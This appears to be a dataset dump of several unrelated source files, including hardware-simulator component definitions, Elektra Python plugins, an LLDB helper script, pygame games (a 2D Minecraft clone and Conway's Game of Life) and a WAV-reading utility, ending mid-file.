self.bind(corruptor, 'i2c', self, 'i2c')
self.bind(corruptor, 'clock_cfg', clock, 'clock_in')
class Corruptor_implem(st.Component):
def __init__(self, parent, name, address):
super(Corruptor.Corruptor_implem, self).__init__(parent, name)
self.add_property('vp_component', 'devices.i2c.corruptor.i2c_corruptor')
```
#### File: ips/cache/hierarchical_cache.py
```python
import gsystree as st
from ips.cache.cache import Cache
from ips.interco.interleaver import Interleaver
import math
class Hierarchical_cache(st.Component):
def __init__(self, parent, name, config):
super(Hierarchical_cache, self).__init__(parent, name)
#
# Properties
#
self.add_properties(config)
nb_cores = self.get_property('nb_cores')
has_cc = self.get_property('has_cc')
nb_l1_banks = self.get_property('nb_l1_banks')
nb_l1_banks_log2 = int(math.log(nb_l1_banks, 2.0))
nb_pes = nb_cores - 1 if has_cc else nb_cores
l1_line_size_bits = self.get_property('l1/line_size_bits', int)
l1_cache_line_size = 1 << l1_line_size_bits
#
# Components
#
# L0 caches
l0_caches = []
for i in range(0, nb_pes):
l0_caches.append(Cache(self, 'l0_bank%d' % i, **self.get_property('l0')))
if has_cc:
l0_caches.append(Cache(self, 'l0_bank%d' % (nb_cores-1), **self.get_property('l0_cc')))
# L1 caches
l1_caches = []
for i in range(0, nb_l1_banks):
l1_caches.append(Cache(self, 'l1_bank%d' % i, **self.get_property('l1'), refill_shift=nb_l1_banks_log2, add_offset=i*l1_cache_line_size))
# L1 interleaver
interleaver = Interleaver(self, 'interleaver', nb_slaves=nb_l1_banks, interleaving_bits=l1_line_size_bits)
#
# Bindings
#
# L0 caches
for i in range(0, nb_cores):
self.bind(self, 'input_%d' % i, l0_caches[i], 'input')
self.bind(l0_caches[i], 'refill', interleaver, 'input')
self.bind(self, 'enable', l0_caches[i], 'enable')
self.bind(self, 'flush', l0_caches[i], 'flush')
# L1 cache
for i in range(0, nb_l1_banks):
self.bind(l1_caches[i], 'refill', self, 'refill')
self.bind(self, 'enable', l1_caches[i], 'enable')
self.bind(self, 'flush', l1_caches[i], 'flush')
# Interleaver
for i in range(0, nb_l1_banks):
self.bind(interleaver, 'out_%d' % i, l1_caches[i], 'input')
```
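The component above only documents its configuration through the `get_property` calls; a sketch of a matching `config` dictionary follows, where the nested cache parameters are assumptions and only the top-level keys come from the code:
```python
# Hypothetical configuration for Hierarchical_cache; nested values are illustrative only.
config = {
    'nb_cores': 9,       # e.g. 8 processing elements + 1 cluster controller
    'has_cc': True,
    'nb_l1_banks': 4,    # must be a power of two (log2 is taken above)
    'l0': {'size': 512},                        # kwargs forwarded to each L0 Cache (assumed keys)
    'l0_cc': {'size': 512},
    'l1': {'size': 4096, 'line_size_bits': 4},
}
# cache = Hierarchical_cache(parent, 'icache', config)   # parent must be a gsystree component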
#### File: ips/clock/clock_domain.py
```python
import gsystree as st
class Clock_domain(st.Component):
def __init__(self, parent, name, frequency, factor=1):
super(Clock_domain, self).__init__(parent, name)
self.add_properties({
'vp_component': "vp.clock_domain_impl",
'frequency': frequency,
'factor': factor
})
def gen_gtkw(self, tree, comp_traces):
tree.add_trace(self, 'cycles', 'cycles', tag='clock')
tree.add_trace(self, 'period', 'period', tag='overview')
```
#### File: ips/ne16/ne16.py
```python
import gsystree as st
class Ne16(st.Component):
def __init__(self, parent, name):
super(Ne16, self).__init__(parent, name)
self.add_properties({
'vp_component': 'pulp.ne16.ne16',
})
def gen_gtkw(self, tree, traces):
if tree.get_view() == 'overview':
map_file = tree.new_map_file(self, 'state')
map_file.add_value(1, 'CadetBlue', 'ACTIVE')
tree.add_trace(self, self.name, 'ne16_busy', '[7:0]', map_file=map_file, tag='overview')
else:
map_file = tree.new_map_file(self, 'core_state', width=32)
map_file.add_value(0, 'black', 'IDLE')
map_file.add_value(1, 'CadetBlue', 'START')
map_file.add_value(2, 'CadetBlue', 'START_STREAMIN')
map_file.add_value(3, 'CadetBlue', 'STREAMIN_LOAD')
map_file.add_value(4, 'CadetBlue', 'LOAD_MATRIXVEC')
map_file.add_value(5, 'CadetBlue', 'STREAMIN')
map_file.add_value(6, 'CadetBlue', 'LOAD')
map_file.add_value(7, 'CadetBlue', 'MATRIXVEC')
map_file.add_value(8, 'CadetBlue', 'NORMQUANT_SHIFT')
map_file.add_value(9, 'CadetBlue', 'NORMQUANT_MULT')
map_file.add_value(10, 'CadetBlue', 'NORMQUANT_BIAS')
map_file.add_value(11, 'CadetBlue', 'STREAMOUT')
map_file.add_value(12, 'CadetBlue', 'END')
tree.add_trace(self, self.name, 'fsm_state', '[31:0]', map_file=map_file, tag='overview')
def gen_gtkw_conf(self, tree, traces):
if tree.get_view() == 'overview':
self.vcd_group(self, skip=True)
else:
self.vcd_group(self, skip=False)
```
#### File: ips/udma/udma_v4.py
```python
import gsystree as st
class Udma(st.Component):
def __init__(self, parent, name, config_file):
super(Udma, self).__init__(parent, name)
self.vcd_group(self, skip=True)
self.add_properties(self.load_property_file(config_file))
def gen_gtkw(self, tree, traces):
if tree.get_view() == 'overview':
map_file = tree.new_map_file(self, 'udma_state')
map_file.add_value(1, 'CadetBlue', 'ACTIVE')
udma_signals = [
['hyper0', 'hyper0.active', '[7:0]'],
['hyper1', 'hyper1.active', '[7:0]']
]
tree.add_vector(self, self.name, traces=udma_signals, map_file=map_file, tag='overview')
```
#### File: python/pulp_open/soc_interco.py
```python
import gsystree as st
import ips.interco.router as router
class Soc_interco(st.Component):
def __init__(self, parent, name, soc, cluster):
super(Soc_interco, self).__init__(parent, name)
ll_ico = router.Router(self, 'll_ico')
ll_ico.add_mapping('apb' , **soc.get_property('peripherals/mapping'))
ll_ico.add_mapping('rom' , base=soc.get_property('apb_ico/mappings/rom/base'), size=soc.get_property('apb_ico/mappings/rom/size'))
ll_ico.add_mapping('axi_master' , **cluster.get_property('mapping'))
ll_ico.add_mapping('l2_priv0' , **soc.get_property('l2/priv0/mapping'))
ll_ico.add_mapping('l2_priv0_alias', **soc.get_property('l2/priv0_alias/mapping'))
ll_ico.add_mapping('l2_priv1' , **soc.get_property('l2/priv1/mapping'))
ll_ico.add_mapping('l2_shared' , **soc.get_property('l2/shared/mapping'))
self.bind(self, 'debug', ll_ico, 'input')
self.bind(self, 'axi_slave', ll_ico, 'input')
hb_ico = router.Router(self, 'hb_ico', remove_offset=soc.get_property('l2/shared/mapping/base'))
l2_shared_size = soc.get_property('l2/shared/mapping/size', int)
l2_shared_nb_regions = soc.get_property('l2/shared/nb_regions')
region_base = soc.get_property('l2/shared/mapping/base', int)
region_size = int(l2_shared_size / l2_shared_nb_regions)
for i in range(0, soc.get_property('l2/shared/nb_regions')):
hb_ico.add_mapping('l2_shared_%d' % i, base=region_base, size=region_size, remove_offset=region_base)
self.bind(hb_ico, 'l2_shared_%d' % i, self, 'l2_shared_%d' % i)
region_base += region_size
fc_fetch_ico = router.Router(self, 'fc_fetch_ico', latency=5)
fc_data_ico = router.Router(self, 'fc_data_ico')
fc_fetch_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
fc_fetch_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping'))
self.bind(fc_fetch_ico, 'xip', self, 'fc_fetch_input')
fc_data_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping'))
self.bind(fc_data_ico, 'xip', self, 'fc_data_input')
fc_fetch_ico.add_mapping('ll_ico')
fc_data_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
fc_data_ico.add_mapping('axi_proxy', base=0x20000000, size=0x10000000)
fc_data_ico.add_mapping('ll_ico')
udma_rx_ico = router.Router(self, 'udma_rx_ico')
udma_rx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
udma_rx_ico.add_mapping('ll_ico')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
udma_tx_ico = router.Router(self, 'udma_tx_ico', latency=4)
udma_tx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping'))
self.bind(udma_tx_ico, 'l2_shared', hb_ico, 'input')
udma_tx_ico.add_mapping('ll_ico')
self.bind(udma_tx_ico, 'll_ico', ll_ico, 'input')
self.bind(self, 'udma_tx', udma_tx_ico, 'input')
self.bind(self, 'input', hb_ico, 'input')
self.bind(self, 'fc_fetch', fc_fetch_ico, 'input')
self.bind(self, 'fc_data', fc_data_ico, 'input')
self.bind(fc_fetch_ico, 'l2_shared', hb_ico, 'input')
self.bind(fc_fetch_ico, 'll_ico', ll_ico, 'input')
self.bind(fc_data_ico, 'l2_shared', hb_ico, 'input')
self.bind(fc_data_ico, 'll_ico', ll_ico, 'input')
self.bind(fc_data_ico, 'axi_proxy', self, 'axi_proxy')
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input')
self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input')
self.bind(ll_ico, 'apb', self, 'apb')
self.bind(ll_ico, 'rom', self, 'apb')
self.bind(ll_ico, 'l2_priv0', self, 'l2_priv0')
self.bind(ll_ico, 'l2_priv0_alias', self, 'l2_priv0')
self.bind(ll_ico, 'l2_priv1', self, 'l2_priv1')
self.bind(ll_ico, 'l2_shared', hb_ico, 'input')
self.bind(ll_ico, 'axi_master', self, 'axi_master')
``` |
{
"source": "0003088/libelektra-qt-gui-test",
"score": 2
} |
#### File: python/python/python_configparser.py
```python
import kdb
import configparser
class ElektraPlugin(object):
def __init__(self):
pass
def open(self, errorKey):
print("[CLASS-PYTHON-C] open")
return 0
def get(self, returned, parentKey):
print("[CLASS-PYTHON-C] get")
mod = "system/elektra/modules/python"
if parentKey.name == mod:
returned.append(kdb.Key(mod, kdb.KEY_VALUE, "contract below"))
returned.append(kdb.Key(mod+"/infos", kdb.KEY_VALUE, "contract below"))
returned.append(kdb.Key(mod+"/infos/provides", kdb.KEY_VALUE, "storage"))
returned.append(kdb.Key(mod+"/infos/placements", kdb.KEY_VALUE, "getstorage setstorage"))
return 1
config = configparser.ConfigParser()
        config.read_file(open(parentKey.value))
for s in config.sections():
for o in config.options(s):
returned.append(kdb.Key(parentKey.name+"/"+s+"/"+o, kdb.KEY_VALUE, config.get(s, o)))
return 1
def set(self, returned, parentKey):
print("[CLASS-PYTHON-C] set")
return 1
def error(self, returned, parentKey):
print("[CLASS-PYTHON-C] error")
return 1
def close(self, errorKey):
print("[CLASS-PYTHON-C] <-- close")
return 0
```
#### File: python/python/python_plugin_fail.py
```python
class ElektraPlugin(object):
def open(self, errorKey):
return 0
def get(self, returned, parentKey):
return -1
def set(self, returned, parentKey):
return -1
def error(self, returned, parentKey):
return -1
def close(self, errorKey):
return 0
```
#### File: gen/support/cpp.py
```python
from support.c import *
class CppSupport(CSupport):
def generateotransform(self, info, index):
"""Generates the code to transform values"""
k = "override/#" + str(index) + "/transform/cpp"
if k in info:
f = info.get(k)
            return f
return "return value"
def generateftransform(self, info, index):
"""Generates the code to transform values"""
k = "fallback/#" + str(index) + "/transform/cpp"
if k in info:
f = info.get(k)
            return f
return "return value"
def funcpretty(self, key):
"""Return pretty printed key name for functions"""
return key.title().replace('_','').replace('/','').replace('#','')
def getfuncname(self, key):
"""CamelCase"""
return "get"+self.funcname(key)
def setfuncname(self, key):
"""CamelCase"""
return "set"+self.funcname(key)
def valof(self, info):
"""Return the default value for given parameter"""
val = info["default"]
type = info["type"]
if self.isenum(info):
return " = "+self.enumname(info)+"::"+val+";"
elif type == "string" and val == "":
return ' = "";'
return " = "+val+";"
def typeof(self, info):
"""Return the type for given parameter"""
type = info["type"]
if type == "string":
return "std::string"
elif self.isenum(info):
return self.enumname(info)
else:
return "kdb::"+type+"_t"
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: gen/support/util.py
```python
import uuid
generated_uuid = str(uuid.uuid4()).replace('-','_').upper()
from os.path import basename, dirname
def includeguard(filename):
if filename == '-':
return "ELEKTRA_GEN_" + generated_uuid + "_H"
else:
return "ELEKTRA_GEN_" + generated_uuid + "_" + filename.replace('.','_').upper()
``` |
{
"source": "000alen/Phaedra",
"score": 3
} |
#### File: Phaedra/Phaedra/Knowledge.py
```python
from typing import Dict, List
import wikipedia
def wsummary(query: str) -> str:
"""Returns Wikipedia summary.
:param query: Query to search Wikipedia for.
:type query: str
:return: Summary of the Wikipedia page.
:rtype: str
"""
return wikipedia.summary(query)
def wsuggestion(query: str) -> Dict[str, str]:
"""Returns Wikipedia suggestions.
:param query: Query to search Wikipedia for.
:type query: str
:return: Dictionary of suggestions.
:rtype: Dict[str, str]
"""
suggestions, _ = wikipedia.search(query, results=5, suggestion=True)
return {suggestion: wikipedia.page(suggestion).url for suggestion in suggestions}
def wimage(query: str) -> List[str]:
"""Returns Wikipedia image.
:param query: Query to search Wikipedia for.
:type query: str
:return: URL of the Wikipedia image.
:rtype: str
"""
wikipedia_page = wikipedia.page(query)
return wikipedia_page.images
```
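A quick usage sketch of the three helpers above; network access is required and the actual Wikipedia results will vary:
```python
# Hypothetical usage of the Wikipedia helpers above.
from Phaedra.Knowledge import wsummary, wsuggestion, wimage

print(wsummary("Alan Turing")[:200])        # first 200 characters of the summary
for title, url in wsuggestion("Alan Turing").items():
    print(title, "->", url)
print(wimage("Alan Turing")[:3])            # first few image URLs on the page
```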
#### File: Phaedra/Phaedra/Secrets.py
```python
import json
from typing import Dict
import openai
def get_secrets() -> Dict[str, str]:
"""Gets secrets from local file (secret.json).
:return: Dictionary of secrets.
:rtype: Dict[str, str]
"""
with open("secrets.json") as file:
secrets = json.load(file)
return secrets
def get_secrets_remote() -> Dict[str, str]:
"""Gets secrets from remote file (secret.json) located in Google Drive.
Must be ran from Google Colaboratory.
:return: Dictionary of secrets.
:rtype: Dict[str, str]
"""
from google.colab import drive # type: ignore
drive.mount("/content/drive")
with open("/content/drive/MyDrive/secrets.json") as file:
secrets = json.load(file)
return secrets
def set_secrets(secrets: Dict[str, str]):
"""Loads secrets (credentials).
:param secrets: Dictionary of secrets.
:type secrets: Dict[str, str]
"""
openai.api_key = secrets["KEY"]
```
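The expected layout of `secrets.json` is only implied by `set_secrets` (it reads a `"KEY"` entry); a minimal local sketch, with a made-up key value:
```python
# Assumed secrets.json in the working directory:
# {"KEY": "sk-..."}
from Phaedra.Secrets import get_secrets, set_secrets

secrets = get_secrets()   # reads ./secrets.json
set_secrets(secrets)      # configures openai.api_key
```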
#### File: Phaedra/Phaedra/Text.py
```python
import re
import string
from typing import List, Union, BinaryIO
import pdfplumber # type: ignore
from nltk import word_tokenize, corpus, download # type: ignore
download("punkt")
download("stopwords")
download("wordnet")
__all__ = ("extract_text_from_pdf", "extract_text_from_pdf_to_pages", "preprocess_text")
stop_words = corpus.stopwords.words("english")
title_expression = re.compile(r"[0-9]+\.(\w|\s)+")
def extract_text_from_pdf(file_path_or_stream: Union[str, BinaryIO]) -> str:
"""Extracts text from a PDF file.
:param file_path_or_stream: The path to the PDF file or a file-like object.
:type file_path_or_stream: str | BinaryIO
:return: The extracted text.
:rtype: str
"""
return "".join(
page.extract_text() for page in pdfplumber.open(file_path_or_stream).pages
)
def extract_text_from_pdf_to_pages(
file_path_or_stream: Union[str, BinaryIO]
) -> List[str]:
"""Extracts text from a PDF file and separates it into pages.
:param file_path_or_stream: The path to the PDF file or a file-like object.
:type file_path_or_stream: str | BinaryIO
:return: The extracted text separated into pages.
:rtype: list[str]
"""
return [page.extract_text() for page in pdfplumber.open(file_path_or_stream).pages]
# XXX: Hacky
def preprocess_text(text: str) -> str:
"""Preprocesses text (tries to remove useless text).
:param text: The text to preprocess.
:type text: str
:return: The preprocessed text.
:rtype: str
"""
response_text: str = ""
for line in text.split("\n"):
all_words = word_tokenize(line)
has_stop_word = False
for word in all_words:
if word.lower() in stop_words:
has_stop_word = True
break
acceptable_word = has_stop_word
if any(c not in string.printable for c in line):
acceptable_word = False
if title_expression.match(line):
acceptable_word = True
if "[" in line.split(" ")[0] and "]" in line.split(" ")[0]:
acceptable_word = True
if line.count(" ") > len(line) / 5:
acceptable_word = False
if acceptable_word:
response_text += line + "\n"
return response_text
``` |
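A short sketch tying the extraction and clean-up helpers together; `paper.pdf` is a placeholder path:
```python
# Hypothetical usage of the PDF helpers above.
from Phaedra.Text import extract_text_from_pdf_to_pages, preprocess_text

pages = extract_text_from_pdf_to_pages("paper.pdf")   # one string per page
cleaned = [preprocess_text(page) for page in pages]
print(len(pages), "pages,", sum(len(c) for c in cleaned), "characters kept")
```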
{
"source": "000james000/swift",
"score": 2
} |
#### File: utils/lldb/lldbToolBox.py
```python
import argparse
import os
import shlex
import subprocess
import sys
import tempfile
import lldb
REPO_BASE = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
os.pardir, os.pardir))
SWIFT_REPO = os.path.join(REPO_BASE, "swift")
LLVM_REPO = os.path.join(REPO_BASE, "llvm")
LLVM_DATAFORMATTER_PATH = os.path.join(LLVM_REPO, "utils",
"lldbDataFormatters.py")
SWIFT_DATAFORMATTER_PATH = os.path.join(SWIFT_REPO, "utils",
"lldb", "lldbSwiftDataFormatters.py")
def import_llvm_dataformatters(debugger):
if not os.access(LLVM_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find LLVM data formatters!")
return
cmd = 'command script import {}'.format(LLVM_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded LLVM data formatters.")
def import_swift_dataformatters(debugger):
if not os.access(SWIFT_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find Swift data formatters!")
return
cmd = 'command script import {}'.format(SWIFT_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded Swift data formatters.")
VIEWCFG_PATH = os.path.join(SWIFT_REPO, "utils", "viewcfg")
BLOCKIFYASM_PATH = os.path.join(SWIFT_REPO, "utils", "dev-scripts",
"blockifyasm")
def disassemble_asm_cfg(debugger, command, exec_ctx, result, internal_dict):
"""
This function disassembles the current assembly frame into a temporary file
and then uses that temporary file as input to blockifyasm | viewcfg. This
will cause a pdf of the cfg to be opened on Darwin.
"""
d = exec_ctx.frame.Disassemble()
with tempfile.TemporaryFile() as f:
f.write(bytes(d, 'utf-8'))
f.flush()
f.seek(0)
p1 = subprocess.Popen([BLOCKIFYASM_PATH], stdin=f,
stdout=subprocess.PIPE)
subprocess.Popen([VIEWCFG_PATH], stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
def disassemble_to_file(debugger, command, exec_ctx, result, internal_dict):
"""This function disassembles the current assembly frame into a file specified
by the user.
"""
parser = argparse.ArgumentParser(prog='disassemble-to-file', description="""
Dump the disassembly of the current frame to the specified file.
""")
parser.add_argument('file', type=argparse.FileType('w'),
default=sys.stdout)
args = parser.parse_args(shlex.split(command))
args.file.write(exec_ctx.frame.disassembly)
def sequence(debugger, command, exec_ctx, result, internal_dict):
"""
Combine multiple semicolon separated lldb commands into one command.
This command is particularly useful for defining aliases and breakpoint
commands. Some examples:
# Define an alias that prints rax and also steps one instruction.
command alias xs sequence p/x $rax; stepi
# Breakpoint command to show the frame's info and arguments.
breakpoint command add -o 'seq frame info; reg read arg1 arg2 arg3'
# Override `b` to allow a condition to be specified. For example:
# b someMethod if someVar > 2
command regex b
s/(.+) if (.+)/seq _regexp-break %1; break mod -c "%2"/
s/(.*)/_regexp-break %1/
"""
interpreter = debugger.GetCommandInterpreter()
for subcommand in command.split(';'):
subcommand = subcommand.strip()
if not subcommand:
continue # skip empty commands
ret = lldb.SBCommandReturnObject()
interpreter.HandleCommand(subcommand, exec_ctx, ret)
if ret.GetOutput():
            result.AppendMessage(ret.GetOutput().strip())
if not ret.Succeeded():
result.SetError(ret.GetError())
result.SetStatus(ret.GetStatus())
return
def __lldb_init_module(debugger, internal_dict):
import_llvm_dataformatters(debugger)
import_swift_dataformatters(debugger)
debugger.HandleCommand('command script add disassemble-asm-cfg '
'-f lldbToolBox.disassemble_asm_cfg')
debugger.HandleCommand('command script add disassemble-to-file '
'-f lldbToolBox.disassemble_to_file')
debugger.HandleCommand('command script add sequence '
'-h "Run multiple semicolon separated commands" '
'-f lldbToolBox.sequence')
``` |
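The module is intended to be pulled into an LLDB session; a hedged example of loading it from `~/.lldbinit` (the checkout path is an assumption) and then using the `sequence` command it registers:
```
# ~/.lldbinit  (path to the swift checkout is an assumption)
command script import ~/src/swift/utils/lldb/lldbToolBox.py
# afterwards, inside lldb:
sequence frame info; register read
```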
{
"source": "000Nobody/2D-Minecraft",
"score": 3
} |
#### File: scripts/classes/player.py
```python
import pygame
import os
from ..core_functions import move, distance
from ...variables import *
class Player:
def __init__(self, start_pos, width, height, vel, jump_height, reach_distance=4):
self.width = width
self.height = height
self.vel = vel
self.jump_height = jump_height
self.reach_distance = reach_distance
self.rect = pygame.Rect(start_pos[0], start_pos[1], width, height)
self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE)
self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE)
self.jumping = False
self.moving_right = False
self.moving_left = False
self.movement = [0, 0]
self.selected_block = None
self.current_chunk = (0, 0)
self.inventory = []
self.current_animation = 'idle'
self.animations = self.load_animations('data/imgs/player')
self.animation_counter = 0
self.animation_flip = False
def move(self, tile_rects):
self.rect, self.collision_types, self.hit_list = move(self.rect, tile_rects, self.movement)
if self.collision_types['bottom'] and not self.jumping:
self.movement[1] = 1
if not self.collision_types['bottom']:
self.jumping = False
self.movement[1] += GRAVITY_STRENGTH
if self.collision_types['top']:
self.movement[1] = 1
if self.moving_right:
self.movement[0] = self.vel
self.current_animation = 'walk'
self.animation_flip = False
if self.moving_left:
self.movement[0] = -self.vel
self.current_animation = 'walk'
self.animation_flip = True
if self.jumping and self.collision_types['bottom']:
self.movement[1] = -self.jump_height
self.jumping = False
if not self.moving_left and not self.moving_right:
self.movement[0] = 0
self.current_animation = 'idle'
if self.movement[1] > 30:
self.movement[1] = 30
def get_selected_block(self, terrain, mx, my):
mx += scroll[0]
my += scroll[1]
selected_coords = (mx//TILE_SIZE, my//TILE_SIZE)
for block in terrain.map:
if selected_coords == block.coords:
if distance(selected_coords, self.coords) <= self.reach_distance:
if not block.rect.colliderect(self.rect):
self.selected_block = block
else:
self.selected_block = None
else:
self.selected_block = None
def break_block(self, terrain, hotbar):
self.current_animation = 'break'
if self.selected_block and self.selected_block.type != 'air':
self.inventory.append(self.selected_block.type)
hotbar.add_block_to_slot(self.selected_block.type, 1)
terrain.remove_block(self.selected_block.pos)
def place_block(self, terrain, hotbar):
self.current_animation = 'place'
if (self.selected_block and self.selected_block.type == 'air'):
if hotbar.selected_slot_content != []:
if hotbar.selected_slot_content[1] > 0:
if terrain.add_block(self.selected_block.pos, hotbar.selected_slot_content[0]):
hotbar.slot_contents[hotbar.selected_slot][1] -= 1
def load_animations(self, dir):
animation_dict = {}
for animation in os.listdir(dir):
frame_list = []
for frame in os.listdir(dir + '/' + animation):
img = pygame.image.load(dir+'/'+animation+'/'+frame).convert_alpha()
img = pygame.transform.scale(img, (TILE_SIZE*2-10, TILE_SIZE*2-10))
frame_list.append(img)
animation_dict[animation] = frame_list
return animation_dict
def draw(self, display):
# temp_rect = pygame.Rect(self.rect.x - scroll[0], self.rect.y - scroll[1], self.width, self.height)
# pygame.draw.rect(display, 'white', temp_rect)
if self.animation_counter//7 < len(self.animations[self.current_animation]):
current_img = self.animations[self.current_animation][self.animation_counter//7]
else:
self.animation_counter = 0
current_img = self.animations[self.current_animation][self.animation_counter//7]
self.animation_counter += 1
if self.animation_flip:
current_img = pygame.transform.flip(current_img, True, False)
scrolled_pos = (self.rect.x - scroll[0]-30, self.rect.y - scroll[1]+3)
display.blit(current_img, scrolled_pos)
if self.selected_block:
block_rect = pygame.Rect(
self.selected_block.x - scroll[0],
self.selected_block.y - scroll[1],
TILE_SIZE,
TILE_SIZE
)
pygame.draw.rect(display, 'black', block_rect, 3)
def update(self, terrain):
self.move(terrain.tile_rects)
self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE)
self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE)
for block in terrain.map:
if self.coords == block.coords:
self.current_chunk = block.chunk
```
#### File: data/scripts/core_functions.py
```python
import pygame
import math
def draw(display, *classes):
display.fill((227, 247, 255))
for item in classes:
if isinstance(item, list):
for i in item:
i.draw(display)
else:
item.draw(display)
pygame.display.update()
def move(rect, tiles, movement):
collision_types = {'top':False,'bottom':False,'right':False,'left':False}
rect.x += movement[0]
hit_list = collision_check(rect, tiles)
for tile in hit_list:
if movement[0] > 0:
rect.right = tile.left
collision_types['right'] = True
elif movement[0] < 0:
rect.left = tile.right
collision_types['left'] = True
rect.y += movement[1]
hit_list = collision_check(rect, tiles)
for tile in hit_list:
if movement[1] > 0:
rect.bottom = tile.top
collision_types['bottom'] = True
elif movement[1] < 0:
rect.top = tile.bottom
collision_types['top'] = True
return rect, collision_types, hit_list
def collision_check(rect, tiles):
hit_list = []
for tile in tiles:
if tile not in hit_list:
if rect.colliderect(tile):
hit_list.append(tile)
return hit_list
def distance(pos1, pos2):
x = (pos2[0] - pos1[0])**2
y = (pos2[1] - pos1[1])**2
return math.sqrt(x + y)
def draw_rect_alpha(display, color, rect):
shape_surf = pygame.Surface(pygame.Rect(rect).size, pygame.SRCALPHA)
pygame.draw.rect(shape_surf, color, shape_surf.get_rect())
display.blit(shape_surf, rect)
``` |
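A tiny, self-contained check of how `move` and `collision_check` are meant to be driven, with the helpers above in scope and arbitrary rect sizes:
```python
# Hypothetical usage of the movement helpers above.
import pygame

player = pygame.Rect(0, 0, 16, 16)
tiles = [pygame.Rect(0, 32, 64, 16)]                    # a floor tile below the player
player, hits, hit_list = move(player, tiles, [0, 40])   # try to fall 40 px
print(player.bottom, hits['bottom'])                    # 32 True -> landed on the tile
```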
{
"source": "000Nobody/Conways-Game-Of-Life",
"score": 3
} |
#### File: 000Nobody/Conways-Game-Of-Life/main.py
```python
import sys
import pygame
from pygame.locals import *
run = __name__ == '__main__'
clock = pygame.time.Clock()
#-----Options------
WINDOW_SIZE = (1920, 1080) # (width, height) in pixels
CELL_SIZE = 10 # in pixels
FPS = 15 # number of generations per second
#------------------
screen = pygame.display.set_mode(WINDOW_SIZE)
display = pygame.Surface(WINDOW_SIZE)
cells = []
setting_up = True
lmousedown = False
rmousedown = False
show_grid = False
columns = WINDOW_SIZE[0] // CELL_SIZE
rows = WINDOW_SIZE[1] // CELL_SIZE
play_button_img = pygame.image.load('images/play_button.png').convert_alpha()
pause_button_img = pygame.image.load('images/pause_button.png').convert_alpha()
class Cell():
def __init__(self, x, y, size):
self.x = x
self.y = y
self.size = size
self.living = False
self.x_coord = self.x // size
self.y_coord = self.y // size
self.rect = pygame.Rect(x, y, size, size)
def getNeighbors(self, cells):
# Translates the cells position in the 2d array in
# 8 directions to find the neighboring cells
neighbors = []
translate_directions = [
[0, 1],
[1, 0],
[0,-1],
[-1,0],
[1,-1],
[-1,1],
[1, 1],
[-1,-1],
]
for translation in translate_directions:
x = self.x_coord + translation[0]
y = self.y_coord + translation[1]
# check if neighbor exists
if x < 0 or y < 0 or x >= len(cells[0]) or y >= len(cells):
continue
neighbors.append(cells[y][x])
return neighbors
def update(self):
        living_neighbors = 0
        for neighbor in self.neighbors:
            if neighbor.living:
                living_neighbors += 1
        if self.living:
            if living_neighbors < 2:
                self.lives_next_round = False
            elif living_neighbors > 3:
                self.lives_next_round = False
            else:
                self.lives_next_round = True
        else:
            if living_neighbors == 3:
                self.lives_next_round = True
            else:
                self.lives_next_round = False
# Setting self.lives_next_round instead of self.living so that all cells can update their state at the same time
def draw(self, display):
if self.living:
pygame.draw.rect(display, (255, 255, 255), self.rect)
else:
if show_grid:
pygame.draw.rect(display, (150, 150, 150), self.rect, 1)
# Creating cells and storing them in a 2d array
for i in range(rows):
cells.append([Cell(j*CELL_SIZE, i*CELL_SIZE, CELL_SIZE) for j in range(columns)])
# Once all cells are created, find all of their neighbors
for row in cells:
for cell in row:
cell.neighbors = cell.getNeighbors(cells)
def draw():
display.fill((50, 50, 50))
for row in cells:
for cell in row:
cell.draw(display)
if setting_up:
display.blit(pause_button_img, (0, WINDOW_SIZE[1]-70))
else:
display.blit(play_button_img, (0, WINDOW_SIZE[1]-70))
screen.blit(display, (0, 0))
pygame.display.update()
while run:
if not setting_up:
clock.tick(FPS)
mx, my = pygame.mouse.get_pos()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_g:
show_grid = not show_grid
if setting_up:
if event.type == MOUSEBUTTONDOWN:
if event.button == 1:
lmousedown = True
if event.button == 3:
rmousedown = True
if event.type == MOUSEBUTTONUP:
if event.button == 1:
lmousedown = False
if event.button == 3:
rmousedown = False
if event.type == KEYDOWN:
if event.key == K_SPACE:
setting_up = False
if event.key == K_c:
for row in cells:
for cell in row:
cell.living = False
if lmousedown:
try:
cells[my//CELL_SIZE][mx//CELL_SIZE].living = True
except IndexError:
pass
if rmousedown:
try:
cells[my//CELL_SIZE][mx//CELL_SIZE].living = False
except IndexError:
pass
else:
if event.type == KEYDOWN:
if event.key == K_SPACE:
setting_up = True
if not setting_up:
for row in cells:
for cell in row:
cell.update()
for row in cells:
for cell in row:
cell.living = cell.lives_next_round
draw()
``` |
{
"source": "000ubird/HighResolution",
"score": 3
} |
#### File: libs/audio/read.py
```python
import wave
import numpy
#Given a file name, return the WAV file's sampling rate and sample data as a dict
def read_wav_cd(fileName) :
print("Reading "+fileName)
    #handle the case where the specified file cannot be found
try :
wf = wave.open(fileName, "r")
except FileNotFoundError :
print ("ファイル "+fileName+" が見つかりません")
exit()
    fs = wf.getframerate() #sampling frequency
    N = wf.getnframes() #number of frames
